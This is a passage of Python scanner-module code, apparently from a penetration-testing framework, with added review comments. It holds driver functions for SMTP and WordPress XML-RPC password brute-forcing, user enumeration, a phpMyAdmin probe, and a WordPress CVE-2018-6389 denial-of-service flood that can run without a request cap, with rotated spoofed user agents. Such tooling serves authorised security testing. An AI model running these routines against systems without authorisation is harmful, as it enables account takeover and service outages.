                if int(open(thread_tmp_filename).read().rsplit()[0]) is 0:
                    if limit is not -1:
                        break
            except:
                # NOTE(review): bare except also hides KeyboardInterrupt here.
                pass
            while 1:
                try:
                    if threading.activeCount() >= thread_number:
                        time.sleep(0.01)
                    else:
                        break
                except KeyboardInterrupt:
                    keyboard_interrupt_flag = True
                    break
            if keyboard_interrupt_flag:
                break
        # wait for threads
        kill_switch = 0
        kill_time = int(timeout_sec / 0.1) if int(timeout_sec / 0.1) is not 0 else 1
        while 1:
            time.sleep(0.1)
            kill_switch += 1
            try:
                # Waits for two remaining threads rather than one - presumably
                # the main thread plus the background `test` thread; confirm.
                if threading.activeCount() is 2 or kill_switch is kill_time:
                    break
            except KeyboardInterrupt:
                break
        thread_write = int(open(thread_tmp_filename).read().rsplit()[0])
        if thread_write is 1:
            info(messages(language, 141).format("wordpress_dos_cve_2018_6389_vuln"))
            if verbose_level is not 0:
                data = json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '',
                                   'TYPE': 'wordpress_dos_cve_2018_6389_vuln',
                                   'DESCRIPTION': messages(language, 141).format("wordpress_dos_cve_2018_6389_vuln"),
                                   'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd})
                __log_into_file(log_in_file, 'a', data, language)
        os.remove(thread_tmp_filename)
    else:
        warn(messages(language, 69).format('wordpress_dos_cve_2018_6389_vuln', target))
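def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language,
          verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd):
    """Run the wappalyzer_scan module against a single target.

    Starts a single ``analyze`` thread for the target (``http://`` is prepended
    unless the target type is HTTP), waits for it (bounded by ``timeout_sec``)
    and reports "nothing found" when the scratch file still holds its initial
    ``1``; the JSON record is only written when ``verbose_level`` is non-zero.

    ``users``, ``passwds``, ``ports`` and ``methods_args`` are not used by this
    module; ``scan_id`` and ``scan_cmd`` are copied into the log record.
    """
    # NOTE(review): this `or` chain is true for every possible target type, so
    # the final `else` is unreachable and no target-type validation happens.
    if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or \
            target_type(target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6':
        threads = []
        # NOTE(review): scratch file name comes from `random`, not `tempfile`;
        # confirm <load_file_path()>/tmp is not writable by other local users.
        thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join(
            random.choice(string.ascii_letters + string.digits) for _ in range(20))
        __log_into_file(thread_tmp_filename, 'w', '1', language)
        trying = 0
        total_req = 8000
        if target_type(target) != "HTTP":
            target = 'http://' + target
        t = threading.Thread(
            target=analyze,
            args=(target, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename,
                  retries, socks_proxy, scan_id, scan_cmd))
        threads.append(t)
        t.start()
        trying += 1
        if verbose_level > 3:
            # NOTE(review): the progress line is labelled 'dir_scan' although
            # every other string here says 'wappalyzer_scan' - looks like a
            # copy-paste leftover; confirm before changing the log text.
            info(messages(language, "trying_message").format(
                trying, total_req, num, total, target_to_host(target), "", 'dir_scan'))
        while 1:
            try:
                if threading.activeCount() >= thread_number:
                    time.sleep(0.01)
                else:
                    break
            except KeyboardInterrupt:
                break

        # wait for threads
        kill_switch = 0
        kill_time = int(timeout_sec / 0.1) or 1
        while 1:
            time.sleep(0.1)
            kill_switch += 1
            try:
                if threading.activeCount() == 1 or kill_switch == kill_time:
                    break
            except KeyboardInterrupt:
                break
        # Close the scratch file handle before the file is removed below; the
        # original left it to the garbage collector.
        with open(thread_tmp_filename) as scratch:
            thread_write = int(scratch.read().rsplit()[0])
        if thread_write == 1:
            info(messages(language, "nothing_found").format(target, "wappalyzer_scan"))
            if verbose_level != 0:
                data = json.dumps({
                    'HOST': target_to_host(target),
                    'USERNAME': '',
                    'PASSWORD': '',
                    'PORT': '',
                    'TYPE': 'wappalyzer_scan',
                    'DESCRIPTION': messages(language, "not_found"),
                    'TIME': now(),
                    'CATEGORY': "scan",
                    'SCAN_ID': scan_id,
                    'SCAN_CMD': scan_cmd
                })
                __log_into_file(log_in_file, 'a', data, language)
        os.remove(thread_tmp_filename)
    else:
        warn(messages(language, "input_target_error").format('wappalyzer_scan', target))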
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language,
          verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd):  # Main function
    """Run the smtp_brute module against a single target.

    Filters ``ports`` through ``test_ports`` and then starts ``login`` threads
    in one of two modes selected by ``smtp_brute_split_user_set_pass``:
    ``"False"`` tries every (port, user, password) combination; any other
    value tries, per user, the part before ``@`` with each configured prefix
    appended. Afterwards it waits for the workers (bounded by ``timeout_sec``)
    and, when the scratch file still holds its initial ``1`` and
    ``verbose_level`` is non-zero, appends a "no user/passwords" record.

    ``users``, ``passwds`` and ``ports`` fall back to the ``smtp_brute_*``
    entries of the requirements dict when None.
    """
    # NOTE(review): this `or` chain is true for every possible target type, so
    # the final `else` is unreachable and no target-type validation happens.
    if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type(target) != 'HTTP':
        # requirements check
        new_extra_requirements = extra_requirements_dict()
        if methods_args is not None:
            for extra_requirement in extra_requirements_dict():
                if extra_requirement in methods_args:
                    new_extra_requirements[
                        extra_requirement] = methods_args[extra_requirement]
        extra_requirements = new_extra_requirements
        if users is None:
            users = extra_requirements["smtp_brute_users"]
        if passwds is None:
            passwds = extra_requirements["smtp_brute_passwds"]
        if ports is None:
            ports = extra_requirements["smtp_brute_ports"]
        # Anything other than the two expected strings is coerced to "False".
        if extra_requirements["smtp_brute_split_user_set_pass"][0] not in ["False", "True"]:
            extra_requirements["smtp_brute_split_user_set_pass"][0] = "False"
        if target_type(target) == 'HTTP':
            target = target_to_host(target)
        threads = []
        # Progress total only; it is passed to test_ports and shown in
        # verbose messages.
        total_req = int(
            len(users) * len(passwds) * len(ports) * len(extra_requirements["smtp_brute_split_user_set_pass_prefix"])) \
            if extra_requirements["smtp_brute_split_user_set_pass"][0] == "False" \
            else int(len(users) * len(ports) * len(extra_requirements["smtp_brute_split_user_set_pass_prefix"]))
        # NOTE(review): scratch file names come from `random`, not `tempfile`;
        # confirm <load_file_path()>/tmp is not writable by other local users.
        thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join(
            random.choice(string.ascii_letters + string.digits) for _ in range(20))
        ports_tmp_filename = '{}/tmp/ports_tmp_'.format(load_file_path()) + ''.join(
            random.choice(string.ascii_letters + string.digits) for _ in range(20))
        __log_into_file(thread_tmp_filename, 'w', '1', language)
        __log_into_file(ports_tmp_filename, 'w', '', language)
        ports = test_ports(ports, timeout_sec, target, retries, language, num, total, time_sleep, ports_tmp_filename,
                           thread_number, total_req, verbose_level, socks_proxy)
        trying = 0
        if extra_requirements["smtp_brute_split_user_set_pass"][0] == "False":
            for port in ports:
                for user in users:
                    for passwd in passwds:
                        t = threading.Thread(target=login,
                                             args=(
                                                 user, passwd, target, port, timeout_sec, log_in_file, language,
                                                 retries, time_sleep, thread_tmp_filename, socks_proxy, scan_id,
                                                 scan_cmd))
                        threads.append(t)
                        t.start()
                        trying += 1
                        if verbose_level > 3:
                            info(messages(language, "trying_message").format(trying, total_req, num, total,
                                                                             target, port, 'smtp_brute'))
                        # NOTE(review): this throttle removes items from
                        # `threads` while iterating it, and `isAlive()` no
                        # longer exists on Python 3.9+ (`is_alive()`); this
                        # branch also has no KeyboardInterrupt handling,
                        # unlike the one below.
                        while 1:
                            n = 0
                            for thread in threads:
                                if thread.isAlive():
                                    n += 1
                                else:
                                    threads.remove(thread)
                            if n >= thread_number:
                                time.sleep(0.01)
                            else:
                                break
        else:
            keyboard_interrupt_flag = False
            for port in ports:
                for user in users:
                    for prefix in extra_requirements["smtp_brute_split_user_set_pass_prefix"]:
                        # NOTE(review): this call passes ten arguments to
                        # `login` where the branch above passes thirteen
                        # (socks_proxy, scan_id, scan_cmd are absent) -
                        # confirm against login's signature.
                        t = threading.Thread(target=login,
                                             args=(user, user.rsplit('@')[0] + prefix, target, port, timeout_sec,
                                                   log_in_file, language, retries, time_sleep, thread_tmp_filename))
                        threads.append(t)
                        t.start()
                        trying += 1
                        if verbose_level > 3:
                            info(messages(language, "trying_message").format(trying, total_req, num, total,
                                                                             target, port, 'smtp_brute'))
                        while 1:
                            try:
                                if threading.activeCount() >= thread_number:
                                    time.sleep(0.01)
                                else:
                                    break
                            except KeyboardInterrupt:
                                keyboard_interrupt_flag = True
                                break
                        if keyboard_interrupt_flag:
                            break
                    # NOTE(review): the nesting of the two `else: break`
                    # clauses was reconstructed from a collapsed listing;
                    # as for/else they stop after the first user's prefixes
                    # complete - confirm against the original file.
                    else:
                        break
                else:
                    break
        # wait for threads
        kill_switch = 0
        kill_time = int(
            timeout_sec / 0.1) if int(timeout_sec / 0.1) != 0 else 1
        while 1:
            time.sleep(0.1)
            kill_switch += 1
            try:
                if threading.activeCount() == 1 or kill_switch == kill_time:
                    break
            except KeyboardInterrupt:
                break
        thread_write = int(open(thread_tmp_filename).read().rsplit()[0])
        if thread_write == 1 and verbose_level != 0:
            data = json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'smtp_brute',
                               'DESCRIPTION': messages(language, "no_user_passwords"), 'TIME': now(),
                               'CATEGORY': "brute",
                               'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n"
            __log_into_file(log_in_file, 'a', data, language)
        # NOTE(review): ports_tmp_filename is not removed in this function;
        # presumably test_ports cleans it up - confirm.
        os.remove(thread_tmp_filename)
    else:
        # NOTE(review): other modules format this message with two values
        # (module name, target); only `target` is supplied here.
        warn(messages(language, "input_target_error").format(target))
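def start(target, users, passwds, ports, timeout_sec, thread_number, num,
          total, log_in_file, time_sleep, language, verbose_level,
          socks_proxy, retries, methods_args, scan_id, scan_cmd):
    """Drive the wp_xmlrpc_brute module for one target.

    For every port on which ``test`` returns True, one ``check`` thread is
    started per (user, passwd) pair. The spawn loop pauses while
    ``threading.active_count()`` is at or above ``thread_number``. The
    function then waits for the workers, bounded by roughly ``timeout_sec``
    seconds, and removes the per-scan marker file.

    Args:
        target: host, IP or URL; a target whose type is not HTTP gets an
            ``https://`` prefix.
        users, passwds, ports: candidate lists; ``None`` selects the module
            defaults ("wp_users", "wp_passwds", "wp_xmlrpc_brute_ports").
        timeout_sec: forwarded to ``test``/``check``; also bounds the final
            wait.
        thread_number: threshold on the active thread count while spawning.
        num, total: progress counters, used only in the verbose message.
        log_in_file, language, time_sleep, retries, socks_proxy, scan_id,
            scan_cmd: forwarded to ``test`` and/or ``check``.
        verbose_level: values above 3 print one "trying_message" per attempt.
        methods_args: optional mapping overriding module defaults by key.

    Returns:
        None.
    """
    # The original chain `type != A or type != B or ...` is true for every
    # value, so the input_target_error branch could never run. A membership
    # test is what actually refuses unsupported target types.
    kind = target_type(target)
    if kind not in ('SINGLE_IPv4', 'DOMAIN', 'HTTP', 'SINGLE_IPv6'):
        warn(messages(language, "input_target_error").format(
            'wp_xmlrpc_brute', target))
        return

    user_agent_list = [
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5",
        "Googlebot/2.1 ( http://www.googlebot.com/bot.html)",
        "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04"
        " Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13",
        "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)",
        "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
        "Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620",
        "Debian APT-HTTP/1.3 (0.8.10.3)",
        "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
        "Googlebot/2.1 (+http://www.googlebot.com/bot.html)",
        "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
        "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; "
        "http://help.yahoo.com/help/us/shop/merchant/)",
        "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)",
        "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
        "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
    ]
    headers = {
        'User-agent': random.choice(user_agent_list),
        'Content-Type': 'text/xml'
    }

    # Module defaults, with any key present in methods_args overriding them.
    extra_requirements = extra_requirements_dict()
    if methods_args is not None:
        for name in extra_requirements_dict():
            if name in methods_args:
                extra_requirements[name] = methods_args[name]

    if users is None:
        users = extra_requirements["wp_users"]
    if passwds is None:
        passwds = extra_requirements["wp_passwds"]
    if ports is None:
        ports = extra_requirements["wp_xmlrpc_brute_ports"]
    # Both branches of the original verbose_level test computed this value.
    total_req = len(users) * len(passwds) * len(ports)

    # Marker file shared with the worker threads; it starts out holding '1'.
    # NOTE(review): the suffix comes from `random`, not a CSPRNG; if this
    # tmp directory can be written by other local users, confirm that a
    # guessable name is acceptable.
    thread_tmp_filename = '{}/tmp/thread_tmp_'.format(
        load_file_path()) + ''.join(
        random.choice(string.ascii_letters + string.digits)
        for _ in range(20))
    __log_into_file(thread_tmp_filename, 'w', '1', language)

    trying = 0
    if kind != "HTTP":
        target = 'https://' + target

    threads = []
    # Set once an interrupt is caught in the throttle loop and checked at
    # every loop level, so a stop request ends the whole run rather than
    # only the innermost loop.
    keyboard_interrupt_flag = False
    for port in ports:
        if test(str(target), port, retries, timeout_sec, headers,
                socks_proxy, verbose_level, trying, total_req, total, num,
                language) is not True:
            warn(messages(language, "open_error").format(target))
            continue
        for user in users:
            for passwd in passwds:
                t = threading.Thread(
                    target=check,
                    args=(user, passwd, target, port, headers, timeout_sec,
                          log_in_file, language, retries, time_sleep,
                          thread_tmp_filename, socks_proxy, scan_id,
                          scan_cmd))
                threads.append(t)
                t.start()
                trying += 1
                if verbose_level > 3:
                    info(messages(language, "trying_message").format(
                        trying, total_req, num, total,
                        target_to_host(target), port, 'wp_xmlrpc_brute'))
                # Hold off spawning while the thread budget is used up.
                while True:
                    try:
                        if threading.active_count() >= thread_number:
                            time.sleep(0.01)
                        else:
                            break
                    except KeyboardInterrupt:
                        keyboard_interrupt_flag = True
                        break
                if keyboard_interrupt_flag:
                    break
            if keyboard_interrupt_flag:
                break
        if keyboard_interrupt_flag:
            break

    # Wait for the workers, giving up after about timeout_sec seconds.
    # The counters are compared by value: the original `is` comparisons are
    # only reliable for CPython's cached small ints, so with a large
    # timeout the kill switch might never have matched.
    kill_time = int(timeout_sec / 0.1) or 1
    kill_switch = 0
    while True:
        time.sleep(0.1)
        kill_switch += 1
        try:
            if threading.active_count() == 1 or kill_switch >= kill_time:
                break
        except KeyboardInterrupt:
            break

    # Read the marker through a context manager so the handle is closed
    # before the file is removed. The parsed value is not used further in
    # this function.
    with open(thread_tmp_filename) as marker:
        thread_write = int(marker.read().rsplit()[0])
    os.remove(thread_tmp_filename)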
def start(
    target,
    users,
    passwds,
    ports,
    timeout_sec,
    thread_number,
    num,
    total,
    log_in_file,
    time_sleep,
    language,
    verbose_level,
    socks_proxy,
    retries,
    methods_args,
    scan_id,
    scan_cmd,
):
    """Prepare the pma_scan request template and hand it to ``__repeater``.

    The function merges ``methods_args`` over the module defaults, forces
    the HTTP method to GET when the configured one is not GET or HEAD,
    creates the per-scan marker file, and builds the request text, match
    condition and sample event that are passed on together with
    ``extra_requirements["pma_scan_list"]``.

    ``users``, ``passwds``, ``num`` and ``total`` are accepted but not read
    in this function. Returns None.
    """
    # NOTE(review): this `!= ... or != ...` chain is true for every value of
    # target_type(target), so the else branch at the bottom never runs and no
    # target type is actually rejected here.
    if (
        target_type(target) != "SINGLE_IPv4"
        or target_type(target) != "DOMAIN"
        or target_type(target) != "HTTP"
        or target_type(target) != "SINGLE_IPv6"
    ):
        # Only these methods are accepted; anything else falls back to GET.
        http_methods = ["GET", "HEAD"]
        # Module defaults, with any key present in methods_args overriding them.
        new_extra_requirements = extra_requirements_dict()
        if methods_args is not None:
            for extra_requirement in extra_requirements_dict():
                if extra_requirement in methods_args:
                    new_extra_requirements[extra_requirement] = methods_args[
                        extra_requirement
                    ]
        extra_requirements = new_extra_requirements
        if extra_requirements["pma_scan_http_method"][0] not in http_methods:
            warn(messages(language, "dir_scan_get"))
            extra_requirements["pma_scan_http_method"] = ["GET"]
        # Per-scan marker file, created holding "1".
        thread_tmp_filename = "{}/tmp/thread_tmp_".format(
            load_file_path()
        ) + "".join(
            random.choice(string.ascii_letters + string.digits)
            for _ in range(20)
        )
        __log_into_file(thread_tmp_filename, "w", "1", language)
        default_ports = [80, 443]
        # NOTE(review): the backslash-newline continuations inside the three
        # literals below carry the next line's leading whitespace into the
        # runtime string. The exact run of spaces is not recoverable from
        # this listing; confirm it against the module file.
        # `{{0}}` survives this .format() as `{0}`, leaving a slot in the
        # request line (presumably filled in by __repeater; verify).
        request = """{0} __target_locat_here__{{0}} \
        HTTP/1.1\nUser-Agent: {1}\n\n""".format(
            extra_requirements["pma_scan_http_method"][0],
            random.choice(useragents.useragents())
            if extra_requirements["pma_scan_random_agent"][0].lower() == "true"
            else "Mozilla/5.0 (Windows; U; Windows NT 5.1; \
            en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5",
        )
        status_codes = [200, 401, 403]
        # Both strings below hold Python expression text, not values.
        # NOTE(review): presumably __repeater evaluates them against each
        # response. If so, a double quote inside the localized "found"
        # message would end the quoted literal early; verify how the
        # helper consumes them.
        condition = "response.status_code in {0}".format(status_codes)
        message = messages(language, "found")
        sample_message = (
            '"'
            + message
            + '"'
            + """.format(response.url, response.status_code,\
            response.reason)"""
        )
        # Event template; "PORT" is the literal string "PORT" here
        # (presumably a placeholder substituted downstream; confirm).
        sample_event = {
            "HOST": target_to_host(target),
            "USERNAME": "",
            "PASSWORD": "",
            "PORT": "PORT",
            "TYPE": "pma_scan",
            "DESCRIPTION": sample_message,
            "TIME": now(),
            "CATEGORY": "scan",
            "SCAN_ID": scan_id,
            "SCAN_CMD": scan_cmd,
        }
        counter_message = messages(language, "phpmyadmin_dir_404")
        __repeater(
            request,
            [extra_requirements["pma_scan_list"]],
            timeout_sec,
            thread_number,
            log_in_file,
            time_sleep,
            language,
            verbose_level,
            socks_proxy,
            retries,
            scan_id,
            scan_cmd,
            condition,
            thread_tmp_filename,
            sample_event,
            sample_message,
            target,
            ports,
            default_ports,
            counter_message,
        )
    else:
        warn(
            messages(language, "input_target_error").format("pma_scan", target)
        )
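def start(
    target,
    users,
    passwds,
    ports,
    timeout_sec,
    thread_number,
    num,
    total,
    log_in_file,
    time_sleep,
    language,
    verbose_level,
    socks_proxy,
    retries,
    methods_args,
    scan_id,
    scan_cmd,
):
    """Run the wp_user_enum_scan module against one target.

    One ``__wp_user_enum`` thread is started per port. The spawn loop pauses
    while ``threading.active_count()`` is at or above ``thread_number``.
    After all threads have finished, the marker file is read: if it still
    holds 1 and ``verbose_level`` is non-zero, a "not_found" event is
    printed and appended to ``log_in_file``. The marker file is then
    removed.

    Args:
        target: host or URL; an HTTP-type target is reduced to its host.
        ports: ports to probe; ``None`` selects the module default
            ("wp_user_enum_ports").
        methods_args: optional mapping overriding module defaults by key.
        num, total: progress counters, used only in the verbose message.
        users, passwds, retries: accepted but not read in this function.
        Remaining arguments are forwarded to ``__wp_user_enum`` or used for
        logging.

    Returns:
        None.
    """
    # NOTE(review): this `!= ... or != ...` chain is true for every value of
    # target_type(target), so the else branch at the bottom never runs. The
    # intended accepted set (and whether SINGLE_IPv6 belongs in it) needs
    # confirming before the test is tightened into a membership check.
    if (target_type(target) != "SINGLE_IPv4"
            or target_type(target) != "DOMAIN"
            or target_type(target) != "HTTP"):
        # Module defaults, with any key present in methods_args overriding them.
        extra_requirements = extra_requirements_dict()
        if methods_args is not None:
            for name in extra_requirements_dict():
                if name in methods_args:
                    extra_requirements[name] = methods_args[name]
        if ports is None:
            ports = extra_requirements["wp_user_enum_ports"]
        if target_type(target) == "HTTP":
            target = target_to_host(target)

        total_req = len(ports)
        # Marker file shared with the worker threads; it starts out holding "1".
        thread_tmp_filename = "{}/tmp/thread_tmp_".format(
            load_file_path()) + "".join(
                random.choice(string.ascii_letters + string.digits)
                for _ in range(20))
        __log_into_file(thread_tmp_filename, "w", "1", language)

        trying = 0
        keyboard_interrupt_flag = False
        for port in ports:
            port = int(port)  # converted once; the thread gets the int
            worker = threading.Thread(
                target=__wp_user_enum,
                args=(
                    target,
                    port,
                    timeout_sec,
                    log_in_file,
                    language,
                    time_sleep,
                    thread_tmp_filename,
                    socks_proxy,
                    scan_id,
                    scan_cmd,
                ),
            )
            worker.start()
            trying += 1
            if verbose_level > 3:
                info(
                    messages(language, "trying_message").format(
                        trying,
                        total_req,
                        num,
                        total,
                        target,
                        port,
                        "wp_user_enum_scan",
                    ))
            # Hold off spawning while the thread budget is used up.
            while True:
                try:
                    if threading.active_count() >= thread_number:
                        time.sleep(0.01)
                    else:
                        break
                except KeyboardInterrupt:
                    keyboard_interrupt_flag = True
                    break
            if keyboard_interrupt_flag:
                break

        # Wait for the workers.
        # NOTE(review): this wait has no upper bound; it ends only when the
        # active thread count drops to 1 or an interrupt is caught in the
        # check below. A worker that never returns keeps the scan here.
        while True:
            time.sleep(0.1)
            try:
                if threading.active_count() == 1:
                    break
            except KeyboardInterrupt:
                break

        # Read the marker through a context manager so the handle is closed
        # before the file is removed.
        with open(thread_tmp_filename) as marker:
            thread_write = int(marker.read().rsplit()[0])
        if thread_write == 1 and verbose_level != 0:
            info(messages(language, "not_found"))
            data = json.dumps({
                "HOST": target,
                "USERNAME": "",
                "PASSWORD": "",
                "PORT": "",
                "TYPE": "wp_user_enum_scan",
                "DESCRIPTION": messages(language, "not_found"),
                "TIME": now(),
                "CATEGORY": "scan",
                "SCAN_ID": scan_id,
                "SCAN_CMD": scan_cmd,
            })
            __log_into_file(log_in_file, "a", data, language)
        os.remove(thread_tmp_filename)
    else:
        warn(
            messages(language,
                     "input_target_error").format("wp_user_enum_scan",
                                                  target))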
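def start(target, users, passwds, ports, timeout_sec, thread_number, num,
          total, log_in_file, time_sleep, language, verbose_level,
          socks_proxy, retries, methods_args, scan_id, scan_cmd):
    """Drive the wp_xmlrpc_brute module for one target.

    For every port on which ``test`` returns True, one ``check`` thread is
    started per (user, passwd) pair. The spawn loop pauses while
    ``threading.active_count()`` is at or above ``thread_number``. The
    function then waits for the workers, bounded by roughly ``timeout_sec``
    seconds, and removes the per-scan marker file.

    Args:
        target: host, IP or URL; a target whose type is not HTTP gets an
            ``https://`` prefix.
        users, passwds, ports: candidate lists; ``None`` selects the module
            defaults ("wp_users", "wp_passwds", "wp_xmlrpc_brute_ports").
        timeout_sec: forwarded to ``test``/``check``; also bounds the final
            wait.
        thread_number: threshold on the active thread count while spawning.
        num, total: progress counters, used only in the verbose message.
        log_in_file, language, time_sleep, retries, socks_proxy, scan_id,
            scan_cmd: forwarded to ``test`` and/or ``check``.
        verbose_level: values above 3 print one "trying_message" per attempt.
        methods_args: optional mapping overriding module defaults by key.

    Returns:
        None.
    """
    # The original chain `type != A or type != B or ...` is true for every
    # value, so the input_target_error branch could never run. A membership
    # test is what actually refuses unsupported target types.
    kind = target_type(target)
    if kind not in ('SINGLE_IPv4', 'DOMAIN', 'HTTP', 'SINGLE_IPv6'):
        warn(messages(language, "input_target_error").format(
            'wp_xmlrpc_brute', target))
        return

    # One User-agent is drawn per run and shared by every request.
    user_agent_list = useragents.useragents()
    headers = {
        'User-agent': random.choice(user_agent_list),
        'Content-Type': 'text/xml'
    }

    # Module defaults, with any key present in methods_args overriding them.
    extra_requirements = extra_requirements_dict()
    if methods_args is not None:
        for name in extra_requirements_dict():
            if name in methods_args:
                extra_requirements[name] = methods_args[name]

    if users is None:
        users = extra_requirements["wp_users"]
    if passwds is None:
        passwds = extra_requirements["wp_passwds"]
    if ports is None:
        ports = extra_requirements["wp_xmlrpc_brute_ports"]
    # Both branches of the original verbose_level test computed this value.
    total_req = len(users) * len(passwds) * len(ports)

    # Marker file shared with the worker threads; it starts out holding '1'.
    # NOTE(review): the suffix comes from `random`, not a CSPRNG; if this
    # tmp directory can be written by other local users, confirm that a
    # guessable name is acceptable.
    thread_tmp_filename = '{}/tmp/thread_tmp_'.format(
        load_file_path()) + ''.join(
        random.choice(string.ascii_letters + string.digits)
        for _ in range(20))
    __log_into_file(thread_tmp_filename, 'w', '1', language)

    trying = 0
    if kind != "HTTP":
        target = 'https://' + target

    threads = []
    # Set once an interrupt is caught in the throttle loop and checked at
    # every loop level, so a stop request ends the whole run rather than
    # only the innermost loop.
    keyboard_interrupt_flag = False
    for port in ports:
        if test(str(target), port, retries, timeout_sec, headers,
                socks_proxy, verbose_level, trying, total_req, total, num,
                language) is not True:
            warn(messages(language, "open_error").format(target))
            continue
        for user in users:
            for passwd in passwds:
                t = threading.Thread(
                    target=check,
                    args=(user, passwd, target, port, headers, timeout_sec,
                          log_in_file, language, retries, time_sleep,
                          thread_tmp_filename, socks_proxy, scan_id,
                          scan_cmd))
                threads.append(t)
                t.start()
                trying += 1
                if verbose_level > 3:
                    info(messages(language, "trying_message").format(
                        trying, total_req, num, total,
                        target_to_host(target), port, 'wp_xmlrpc_brute'))
                # Hold off spawning while the thread budget is used up.
                while True:
                    try:
                        if threading.active_count() >= thread_number:
                            time.sleep(0.01)
                        else:
                            break
                    except KeyboardInterrupt:
                        keyboard_interrupt_flag = True
                        break
                if keyboard_interrupt_flag:
                    break
            if keyboard_interrupt_flag:
                break
        if keyboard_interrupt_flag:
            break

    # Wait for the workers, giving up after about timeout_sec seconds.
    kill_time = int(timeout_sec / 0.1) or 1
    kill_switch = 0
    while True:
        time.sleep(0.1)
        kill_switch += 1
        try:
            if threading.active_count() == 1 or kill_switch >= kill_time:
                break
        except KeyboardInterrupt:
            break

    # Read the marker through a context manager so the handle is closed
    # before the file is removed. The parsed value is not used further in
    # this function.
    with open(thread_tmp_filename) as marker:
        thread_write = int(marker.read().rsplit()[0])
    os.remove(thread_tmp_filename)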
def start(target, users, passwds, ports, timeout_sec, thread_number, num,
          total, log_in_file, time_sleep, language, verbose_level,
          socks_proxy, retries, methods_args, scan_id, scan_cmd):
    """Orchestrate the wordpress_dos_cve_2018_6389_vuln module for one target.

    The function builds the target URL, calls ``test`` once and returns
    early if the result is not 0. It then starts a second ``test`` call in
    a thread and one ``send_dos`` thread per loop iteration. After the
    final wait, a "no_vulnerability_found" event is logged if the marker
    file still holds 1, and the marker file is removed.

    ``users``, ``passwds`` and ``ports`` are accepted but not read in this
    function. Returns None.
    """
    # NOTE(review): this `!= ... or != ...` chain is true for every value of
    # target_type(target), so the else branch at the bottom never runs and no
    # target type is actually rejected here.
    if target_type(target) != 'SINGLE_IPv4' or target_type(
            target) != 'DOMAIN' or target_type(
            target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6':
        user_agent_list = useragents.useragents()
        user_agent = {'User-agent': random.choice(user_agent_list)}
        # Default cap on the number of loop iterations below.
        limit = 1000
        # Module defaults, with any key present in methods_args overriding them.
        new_extra_requirements = extra_requirements_dict()
        if methods_args is not None:
            for extra_requirement in extra_requirements_dict():
                if extra_requirement in methods_args:
                    new_extra_requirements[extra_requirement] = methods_args[
                        extra_requirement]
        extra_requirements = new_extra_requirements
        random_agent_flag = True
        if extra_requirements["wordpress_dos_cve_2018_6389_vuln_random_agent"][
                0] != "True":
            random_agent_flag = False
        # NOTE(review): any value other than the exact string "False" sets
        # limit to -1. The counter n only counts upward from 0, so
        # `n != limit` then never becomes false, and the marker-file break
        # in the loop is skipped as well. The run then has no request cap
        # and ends only through the interrupt handling.
        if extra_requirements["wordpress_dos_cve_2018_6389_vuln_no_limit"][
                0] != "False":
            limit = -1
        threads = []
        total_req = limit
        # NOTE(review): filepath is assigned but not read anywhere in this
        # function.
        filepath = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
        # Per-scan marker file, created holding '1'.
        thread_tmp_filename = '{}/tmp/thread_tmp_'.format(
            load_file_path()) + ''.join(
            random.choice(string.ascii_letters + string.digits)
            for _ in range(20))
        __log_into_file(thread_tmp_filename, 'w', '1', language)
        trying = 0
        if target_type(target) == 'SINGLE_IPv4' or target_type(
                target) == 'DOMAIN':
            url = 'http://{0}/'.format(target)
        else:
            # More than one ':' in the target is treated as fatal here.
            if target.count(':') > 1:
                __die_failure(messages(language, "insert_port_message"))
            http = target.rsplit('://')[0]
            host = target_to_host(target)
            path = "/".join(
                target.replace('http://', '').replace('https://',
                                                      '').rsplit('/')[1:])
            url = http + '://' + host + '/' + path
        # NOTE(review): this early return skips the os.remove() at the end,
        # so the marker file created above is left behind on this path.
        if test(url, retries, timeout_sec, user_agent, socks_proxy,
                verbose_level, trying, total_req, total, num, language, False,
                log_in_file, scan_id, scan_cmd, thread_tmp_filename) != 0:
            warn(messages(language, "open_error").format(url))
            return
        info(messages(language, "DOS_send").format(target))
        n = 0
        # Second test() call, now in its own thread and with True in place of
        # the False passed above (the flag's meaning is defined in test(), not
        # shown here).
        t = threading.Thread(
            target=test,
            args=(url, retries, timeout_sec, user_agent, socks_proxy,
                  verbose_level, trying, total_req, total, num, language,
                  True, log_in_file, scan_id, scan_cmd, thread_tmp_filename))
        t.start()
        keyboard_interrupt_flag = False
        while (n != limit):
            n += 1
            if random_agent_flag:
